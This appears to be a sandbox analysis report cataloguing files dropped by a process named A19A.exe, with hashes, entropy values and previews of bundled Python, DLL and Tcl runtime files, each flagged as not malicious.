                                                                                                                                                                                                                                                                                                                                Preview:PK..........!..1Y............_bootlocale.pycB................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJy.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale)...do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc................C........d.S.).N..UTF-8r....).r....r....r....r....r...............c................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).N..UTF-8r....).r....r....r......localer....).r....r....r....r....r....r.....................c................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).N..UTF-8..darwin)...AssertionErro
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3399200
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.094152840203032
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:R3+YyRoAK2rXHsoz5O8M1CPwDv3uFh+r:t9yWAK2zsozZM1CPwDv3uFh+r
                                                                                                                                                                                                                                                                                                                                MD5:CC4CBF715966CDCAD95A1E6C95592B3D
                                                                                                                                                                                                                                                                                                                                SHA1:D5873FEA9C084BCC753D1C93B2D0716257BEA7C3
                                                                                                                                                                                                                                                                                                                                SHA-256:594303E2CE6A4A02439054C84592791BF4AB0B7C12E9BBDB4B040E27251521F1
                                                                                                                                                                                                                                                                                                                                SHA-512:3B5AF9FBBC915D172648C2B0B513B5D2151F940CCF54C23148CD303E6660395F180981B148202BEF76F5209ACC53B8953B1CB067546F90389A6AA300C1FBE477
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K..K..K..;K..K...J..K...J..K...J..K...J..K...J..K..Kb.Kd..J..Kd..J..Kd..J..Kd.WK..Kd..J..KRich..K........................PE..d......^.........." .....R$..........r.......................................`4......~4...`.........................................`...hg...3.@.....3.|.....1.......3. .....3..O...m,.8............................m,...............3..............................text...GQ$......R$................. ..`.rdata.......p$......V$.............@..@.data....z...P1..,...41.............@....pdata..P.....1......`1.............@..@.idata...#....3..$....3.............@..@.00cfg........3......@3.............@..@.rsrc...|.....3......B3.............@..@.reloc..fx....3..z...J3.............@..B................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):689184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.526574117413294
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:1SurcFFRd4l6NCNH98PikxqceDotbA/nJspatQM5eJpAJfeMw4o8s6U2lvz:1KWZH98PiRLsAtf8AmMHogU2lvz
                                                                                                                                                                                                                                                                                                                                MD5:BC778F33480148EFA5D62B2EC85AAA7D
                                                                                                                                                                                                                                                                                                                                SHA1:B1EC87CBD8BC4398C6EBB26549961C8AAB53D855
                                                                                                                                                                                                                                                                                                                                SHA-256:9D4CF1C03629F92662FC8D7E3F1094A7FC93CB41634994464B853DF8036AF843
                                                                                                                                                                                                                                                                                                                                SHA-512:80C1DD9D0179E6CC5F33EB62D05576A350AF78B5170BFDF2ECDA16F1D8C3C2D0E991A5534A113361AE62079FB165FFF2344EFD1B43031F1A7BFDA696552EE173
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E......T...T...T...T...TS.U...TZ.U...TS.U...TS.U...TS.U...T..U...T...T.T..U-..T..U...T..uT...T..U...TRich...T........PE..d......^.........." .....(...H.......%..............................................H.....`..............................................N..85..........s........K...j.. .......L.......8............................................ ..8............................text....&.......(.................. ..`.rdata...%...@...&...,..............@..@.data...!M...p...D...R..............@....pdata..TT.......V..................@..@.idata...V... ...X..................@..@.00cfg...............D..............@..@.rsrc...s............F..............@..@.reloc..5............N..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3750416
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.384383088490926
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:KjVpkcACTIK0IKhyn9iafAdH1ZRHLqUCbNSuvYVeP84mzIAA5H0LMznZPMXT7p31:3CTIdKI7UWu4cAgHCMzqNOyVB
                                                                                                                                                                                                                                                                                                                                MD5:C4709F84E6CF6E082B80C80B87ABE551
                                                                                                                                                                                                                                                                                                                                SHA1:C0C55B229722F7F2010D34E26857DF640182F796
                                                                                                                                                                                                                                                                                                                                SHA-256:CA8E39F2B1D277B0A24A43B5B8EADA5BAF2DE97488F7EF2484014DF6E270B3F3
                                                                                                                                                                                                                                                                                                                                SHA-512:E04A5832B9F2E1E53BA096E011367D46E6710389967FA7014A0E2D4A6CE6FC8D09D0CE20CEE7E7D67D5057D37854EDDAB48BEF7DF1767F2EC3A4AB91475B7CE4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.y...y...y.......y...'...y......y...'...y...'...y...'...y.......y...y...x..,'..Fy..,'...y..,'...y..,'...y..Rich.y..........................PE..d...c.:_.........." .....8.... .....D.........................................<.......9...`.........................................p....... ?/.|.....;.......9..w... 9.......;..q......T........................... ................P..0............................text....7.......8.................. ..`.rdata.......P.......<..............@..@.data....z...p/......P/.............@....pdata...w....9..x...(7.............@..@.gfids.......p;.......8.............@..@.rsrc.........;.......8.............@..@.reloc...q....;..r....8.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):27152
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.048170705523046
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:FekE2XR1G6sOhmQI2HTRcqJcE99qT3dI8qGvnYPLxDG4y8Z6K9:F9csXHN/d9qT3dI8qGvWDG4yM
                                                                                                                                                                                                                                                                                                                                MD5:FB4A0D7ABAEAA76676846AD0F08FEFA5
                                                                                                                                                                                                                                                                                                                                SHA1:755FD998215511506EDD2C5C52807B46CA9393B2
                                                                                                                                                                                                                                                                                                                                SHA-256:65A3C8806D456E9DF2211051ED808A087A96C94D38E23D43121AC120B4D36429
                                                                                                                                                                                                                                                                                                                                SHA-512:F5B3557F823EE4C662F2C9B7ECC5497934712E046AA8AE8E625F41756BEB5E524227355316F9145BFABB89B0F6F93A1F37FA94751A66C344C38CE449E879D35F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i...`.e.k...R...k...R...j...R...c...R...c......k...2...l...i...R......h......h......h......h...Richi...........................PE..d...v.:_.........." .........4.......................................................C....`.........................................0:..L...|:..x............`.......P..........,....3..T...........................`3...............0...............................text............................... ..`.rdata.......0......."..............@..@.data........P.......6..............@....pdata.......`.......<..............@..@.gfids.......p.......@..............@..@.rsrc................B..............@..@.reloc..,............N..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1705120
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.496511987047776
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:umJTd0nVi/Md3bupZkKBhWPRIlq5YZ6a2CXH7oZgKGc+erWJUVWyubuapwQDlaTR:umJTd4iMwXH7oZgKb++BVL4B+GITgr0h
                                                                                                                                                                                                                                                                                                                                MD5:C0B23815701DBAE2A359CB8ADB9AE730
                                                                                                                                                                                                                                                                                                                                SHA1:5BE6736B645ED12E97B9462B77E5A43482673D90
                                                                                                                                                                                                                                                                                                                                SHA-256:F650D6BC321BCDA3FC3AC3DEC3AC4E473FB0B7B68B6C948581BCFC54653E6768
                                                                                                                                                                                                                                                                                                                                SHA-512:ED60384E95BE8EA5930994DB8527168F78573F8A277F8D21C089F0018CD3B9906DA764ED6FCC1BD4EFAD009557645E206FBB4E5BAEF9AB4B2E3C8BB5C3B5D725
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k)...GD..GD..GD.bFE..GD9..D..GD.bDE..GD.bBE..GD.bCE..GD.r.D..GD.jAE..GD.jFE..GD..FD..GD.bOE..GD.bGE..GD.b.D..GD.bEE..GDRich..GD........PE..d......\.........." .....d..........0h.......................................@.......b....`..........................................p..._......T.......0.... ............... .......<...............................=...............................................text....b.......d.................. ..`.rdata...k.......l...h..............@..@.data...."..........................@....pdata....... ......................@..@.rsrc...0...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):10012
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.988870027581882
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:oM9irmCuZgxr31nvnaLAlgspxUth+PNkuQmYz6mh8029d2rPYVzXWamv:oM9irmCuixrxvispxUth+IzX29grPKzu
                                                                                                                                                                                                                                                                                                                                MD5:AAD7CE4027C713577DF2BC8D35406C13
                                                                                                                                                                                                                                                                                                                                SHA1:931262903B347F18AC1BE338524DB851B7AAE5BB
                                                                                                                                                                                                                                                                                                                                SHA-256:D4B3D9601454EA4828DFF3BE426C33FB845D005E98D2CC139DBB0D69CAD3168B
                                                                                                                                                                                                                                                                                                                                SHA-512:F54362286A3BCC4A421AC1687C6C1986C6575CF7233207D905EBE9217323612663728B8300D5660FC1F5A297BE7D2BFA770F8743C8D115533C3EA8BA5004BC36
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# -*- tcl -*-.# ### ### ### ######### ######### #########.## Overview..# Heuristics to assemble a platform identifier from publicly available.# information. The identifier describes the platform of the currently.# running tcl shell. This is a mixture of the runtime environment and.# of build-time properties of the executable itself..#.# Examples:.# <1> A tcl shell executing on a x86_64 processor, but having a.# wordsize of 4 was compiled for the x86 environment, i.e. 32.# bit, and loaded packages have to match that, and not the.# actual cpu..#.# <2> The hp/solaris 32/64 bit builds of the core cannot be.# distinguished by looking at tcl_platform. As packages have to.# match the 32/64 information we have to look in more places. In.# this case we inspect the executable itself (magic numbers,.# i.e. fileutil::magic::filetype)..#.# The basic information used comes out of the 'os' and 'machine'.# entries of the 'tcl_platform' array. A number of general and.# os/machine specific
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5977
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.79231401569641
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Wo05xaJIrnU0gEMydSv+lrnU0gEMPdSvfSrnUN4y1mP3jm5Q1/I+gYQ1KyHe36mV:Wo05xaJsnU0DMAK+5nU0DMFKfunUN4Oc
                                                                                                                                                                                                                                                                                                                                MD5:2A8B773513480EFA986D9CE061218348
                                                                                                                                                                                                                                                                                                                                SHA1:85763F378A68BA6A1EEE9887CDCF34C14D3AD5BF
                                                                                                                                                                                                                                                                                                                                SHA-256:2F812A0550716B88930174A8CA245698427CD286680C0968558AE269AB52440D
                                                                                                                                                                                                                                                                                                                                SHA-512:D3EC3891CC897A8ABB949EBA6A055D9283BA6E491E1CAEA132D894E7B3FD3B159E8226E0BBCDF369DB3F0E00AA1E0347E5B1838353E75B8AE114A83016010238
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.# -*- tcl -*-.# ### ### ### ######### ######### #########.## Overview..# Higher-level commands which invoke the functionality of this package.# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a.# repository as while the tcl shell executing packages uses the same.# platform in general as a repository application there can be.# differences in detail (i.e. 32/64 bit builds)...# ### ### ### ######### ######### #########.## Requirements..package require platform.namespace eval ::platform::shell {}..# ### ### ### ######### ######### #########.## Implementation..# -- platform::shell::generic..proc ::platform::shell::generic {shell} {. # Argument is the path to a tcl shell... CHECK $shell. LOCATE base out.. set code {}. # Forget any pre-existing platform package, it might be in. # conflict with this one.. lappend code {package forget platform}. # Inject our platform package. lappend code [list source $base]. # Query and print the architectu
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):33935
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.898273709861797
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:joWBAxonz0L7KILBk0U8Vl9NFljRFpGA1TrPiBDxDFP8sCNl:MWBAxgzY7KIL7j1NFl1Fp11/PiBVBksU
                                                                                                                                                                                                                                                                                                                                MD5:DB52847C625EA3290F81238595A915CD
                                                                                                                                                                                                                                                                                                                                SHA1:45A4ED9B74965E399430290BCDCD64ACA5D29159
                                                                                                                                                                                                                                                                                                                                SHA-256:4FDF70FDCEDEF97AA8BD82A02669B066B5DFE7630C92494A130FC7C627B52B55
                                                                                                                                                                                                                                                                                                                                SHA-512:5A8FB4ADA7B2EFBF1CADD10DBE4DC7EA7ACD101CB8FD0B80DAD42BE3ED8804FC8695C53E6AEEC088C2D4C3EE01AF97D148B836289DA6E4F9EE14432B923C7E40
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# msgcat.tcl --.#.#.This file defines various procedures which implement a.#.message catalog facility for Tcl programs. It should be.#.loaded with the command "package require msgcat"..#.# Copyright (c) 2010-2015 by Harald Oehlmann..# Copyright (c) 1998-2000 by Ajuba Solutions..# Copyright (c) 1998 by Mark Harrison..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...package require Tcl 8.5-.# When the version number changes, be sure to update the pkgIndex.tcl file,.# and the installation directory in the Makefiles..package provide msgcat 1.6.1..namespace eval msgcat {. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\.. mcpackageconfig mcpackagelocale.. # Records the list of locales to search. variable Loclist {}.. # List of currently loaded locales. variable LoadedLocales {}.. # Rec
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):101389
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.78335748687105
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:r3UFHL/k3tqN0E7NkhtMcrQ3qoyX2/2rCmTMttfN/CrQnXcwIHmlDB/mizvB21J1:r3UdOAVfnPIHmlDFmiDB21cK/xasmhC
                                                                                                                                                                                                                                                                                                                                MD5:D34207F736FA9FC26785A4D87C867A44
                                                                                                                                                                                                                                                                                                                                SHA1:24E533DDD16C67E0D0B9ED303A40C9D90ABF3E80
                                                                                                                                                                                                                                                                                                                                SHA-256:3BFD9E06826C98490E22B00200488D06C1FE49E3B78E24E985ABC377B04021FE
                                                                                                                                                                                                                                                                                                                                SHA-512:1007E5812CBF7D907E33FD769FDC4E9A9D0E68852E91208F5C887A2A86849AF69A11CE4B00358059193A46D17F19C26A255A22C107D30433482A8A0CE7ED0D03
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# tcltest.tcl --.#.#.This file contains support code for the Tcl test suite. It.# defines the tcltest namespace and finds and defines the output.# directory, constraints available, output and error channels,.#.etc. used by Tcl tests. See the tcltest man page for more.#.details..#.# This design was based on the Tcl testing approach designed and.# initially implemented by Mary Ann May-Pumphrey of Sun.#.Microsystems..#.# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998-1999 by Scriptics Corporation..# Copyright (c) 2000 by Ajuba Solutions.# Contributions from Don Porter, NIST, 2002. (not subject to US copyright).# All rights reserved...package require Tcl 8.5-..;# -verbose line uses [info frame].namespace eval tcltest {.. # When the version number changes, be sure to update the pkgIndex.tcl file,. # and the install directory in the Makefiles. When the minor version. # changes (new feature) be sure to update the man page as well..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):108619
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.834993492587442
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:nFRYkDjVePrJwFR09W9JXvfM/2QXjjCV4ScA4MaLm1r:nF2wjVePrJyRpXv9+CV4S74rLg
                                                                                                                                                                                                                                                                                                                                MD5:E9C1DBACE852DE98ECC8906918C3167A
                                                                                                                                                                                                                                                                                                                                SHA1:A3CECEC2C8E67EB0BFCAA6E0DF8970440C29175F
                                                                                                                                                                                                                                                                                                                                SHA-256:D66A3E47106268C4FDE02F857EFDBBC9C44C9BFC6246B7678919F6DAD3C3B68D
                                                                                                                                                                                                                                                                                                                                SHA-512:C830CCA95D8EF2476BFD1B8AA8D0BBD8C557C44989D7398991716DE6F20C075A7FB321ABC0E48A1E5DDF8B4228444678D08761A5FA9D3C417CD58718235F0937
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# http.tcl --.#.#.Client-side HTTP for GET, POST, and HEAD commands. These routines can.#.be used in untrusted code that uses the Safesock security policy..#.These procedures use a callback interface to avoid using vwait, which.#.is not defined in the safe base..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...package require Tcl 8.6-.# Keep this in sync with pkgIndex.tcl and with the install directories in.# Makefiles.package provide http 2.9.0..namespace eval http {. # Allow resourcing to not clobber existing data.. variable http. if {![info exists http]} {..array set http {.. -accept */*.. -pipeline 1.. -postfresh 0.. -proxyhost {}.. -proxyport {}.. -proxyfilter http::ProxyRequired.. -repost 0.. -urlencoding utf-8.. -zip 1..}..# We need a useragent string of this style or various servers will..# refuse to send us compressed content even when we ask for it. This..#
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):21148
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7268785966563405
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:vyPcB5RJtAZ7SP9nYP9I5HU3mOuWzXBEWKYHEN+7yBtYSbI0QD+lM:AcB5RJtAFSPBYPN3mOuiVHEN+78YSbqT
                                                                                                                                                                                                                                                                                                                                MD5:5E9B3E874F8FBEAADEF3A004A1B291B5
                                                                                                                                                                                                                                                                                                                                SHA1:B356286005EFB4A3A46A1FDD53E4FCDC406569D0
                                                                                                                                                                                                                                                                                                                                SHA-256:F385515658832FEB75EE4DCE5BD53F7F67F2629077B7D049B86A730A49BD0840
                                                                                                                                                                                                                                                                                                                                SHA-512:482C555A0DA2E635FA6838A40377EEF547746B2907F53D77E9FFCE8063C1A24322D8FAA3421FC8D12FDCAFF831B517A65DAFB1CEA6F5EA010BDC18A441B38790
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# auto.tcl --.#.# utility procs formerly in init.tcl dealing with auto execution of commands.# and can be auto loaded themselves..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# auto_reset --.#.# Destroy all cached information for auto-loading and auto-execution, so that.# the information gets recomputed the next time it's needed. Also delete any.# commands that are listed in the auto-load index..#.# Arguments:.# None...proc auto_reset {} {. global auto_execs auto_index auto_path. if {[array exists auto_index]} {..foreach cmdName [array names auto_index] {.. set fqcn [namespace which $cmdName].. if {$fqcn eq ""} {...continue.. }.. rename $fqcn {}..}. }. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath. if {[catch {llength $auto_path}]} {..
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):128934
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.001022641779315
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:6klVEuSDFeEzGtdaui+urVke5i1IsQ5SvtTImhrYnPrzAvtt2eyw7uZH/SOyQasa:yDFeEzMaui+urVke5i1R6SvtTImhrYPK
                                                                                                                                                                                                                                                                                                                                MD5:F1E825244CC9741595F47F4979E971A5
                                                                                                                                                                                                                                                                                                                                SHA1:7159DD873C567E10CADAF8638D986FFE11182A27
                                                                                                                                                                                                                                                                                                                                SHA-256:F0CF27CB4B5D9E3B5D7C84B008981C8957A0FF94671A52CC6355131E55DD59FB
                                                                                                                                                                                                                                                                                                                                SHA-512:468C881EB7CE92C91F28CAE2471507A76EF44091C1586DCD716309E3252ED00CCB847EC3296C1954CA6F965161664F7BB73F21A24B9FF5A86F625C0B67C74F67
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:#----------------------------------------------------------------------.#.# clock.tcl --.#.#.This file implements the portions of the [clock] ensemble that are.#.coded in Tcl. Refer to the users' manual to see the description of.#.the [clock] command and its subcommands..#.#.#----------------------------------------------------------------------.#.# Copyright (c) 2004,2005,2006,2007 by Kevin B. Kenny.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.#----------------------------------------------------------------------..# We must have message catalogs that support the root locale, and we need.# access to the Registry on Windows systems...uplevel \#0 {. package require msgcat 1.6. if { $::tcl_platform(platform) eq {windows} } {..if { [catch { package require registry 1.1 }] } {.. namespace eval ::tcl::clock [list variable NoRegistry {}]..}. }.}..# Put the library directory into the namespace
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1090
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.009389929214244
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:5TUvEESVrVJ/eyN9j233V2NdWTeVCT0VbsV7EV7sYnVAMmVZyg851VqxsGkl/:5TUmJvRju3ShVbsZiAMiZyb7PF
                                                                                                                                                                                                                                                                                                                                MD5:68D69C53B4A9F0AABD60646CA7E06DAE
                                                                                                                                                                                                                                                                                                                                SHA1:DD83333DC1C838BEB9102F063971CCC20CC4FD80
                                                                                                                                                                                                                                                                                                                                SHA-256:294C97175FD0894093B866E73548AE660AEED0C3CC1E73867EB66E52D34C0DD2
                                                                                                                                                                                                                                                                                                                                SHA-512:48960E838D30401173EA0DF8597BB5D9BC3A09ED2CFFCB774BA50CB0B2ACCF47AAD3BA2782B3D4A92BEF572CBD98A3F4109FC4344DB82EB207BFDE4F61094D72
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: ascii, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):92873
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.255311357682213
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:3kkmY4kD7HGJxYXIdjQWTGzvKHBDViIM1sbh+dJE+FKw0sXlWVvDg21jj9:cGfKqIQCGzv8D7ksb2Ur79jj9
                                                                                                                                                                                                                                                                                                                                MD5:9E67816F304FA1A8E20D2270B3A53364
                                                                                                                                                                                                                                                                                                                                SHA1:9E35EBF3D5380E34B92FE2744124F9324B901DD3
                                                                                                                                                                                                                                                                                                                                SHA-256:465AE2D4880B8006B1476CD60FACF676875438244C1D93A7DBE4CDE1035E745F
                                                                                                                                                                                                                                                                                                                                SHA-512:EE529DA3511EB8D73465EB585561D54833C46B8C31062299B46F5B9EE7EB5BE473E630AA264F45B2806FC1B480C8ED39A173FF1756CB6401B363568E951F0637
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Encoding file: big5, multi-byte.M.003F 0 89.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.286986942547087
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:CqTUmJvRju3ShVbsZiAMiZyb7Ptuja5z8twsDO4yT2H:JgmOEVIwAMiw/Ptuja5z8RDtyT2H
                                                                                                                                                                                                                                                                                                                                MD5:79ACD9BD261A252D93C9D8DDC42B8DF6
                                                                                                                                                                                                                                                                                                                                SHA1:FA2271030DB9005D71FAAD60B44767955D5432DD
